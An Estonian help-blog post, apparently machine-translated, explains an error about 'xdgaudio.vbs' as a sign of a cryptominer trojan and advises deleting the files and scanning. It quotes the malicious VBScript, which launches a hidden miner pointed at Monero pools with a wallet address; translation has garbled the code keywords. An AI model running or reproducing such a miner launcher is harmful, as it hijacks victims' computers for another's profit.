Kui teie süsteemis kuvatakse järgmine tõrketeade, mis on seotud failiga „xdgaudio.vbs”, siis on teie arvuti tõenäoliselt nakatunud.
Skript: C:\windows\xdgaudio.vbs
Rida: 3
Tähis: 1
Viga: süsteem ei leia määratud faili.
Kood: 80070002
Allikas: (null)
Notepadiga redigeerides võib skript sisaldada järgmisi ridu:
Hämar WShell. Set WShell = CreateObject("WScript. kest") WShell. Käivitage "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv. Rakendus -p x -k -o stratum+tcp://mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJgRv7 -p x", 0. Määra WShell = Mitte midagi
See näeb kindlasti välja nagu protsessori / krüptovaluuta Mineri troojalane, mis mitte ainult ei aeglusta teie arvutit, vaid võib kujutada endast ka turvaohtu. Skripti failid c:\windows\xdgaudio.vbs
ja c:\windows\servicecrsssr.vbs tuleks kustutada. Sellest ei piisa. Käivitage põhjalik skannimine Malwarebytes'i pahavaratõrjega ja skannige ka kasutatava viirusetõrjetarkvaraga.Sellise Mineri troojalase eemaldamise üksikasjalikud juhised leiate malwaretips.com-i juhendist Kuidas eemaldada CPU Miner Trojan Windowsist (viiruse abijuhend).
Üks väike palve: kui teile see postitus meeldis, siis palun jagage seda?
Üks "pisike" jagamine sinult aitaks tõsiselt kaasa selle blogi kasvule. Mõned suurepärased soovitused:- Kinnitage see!
- Jagage seda oma lemmikblogis + Facebookis, Redditis
- Tweet seda!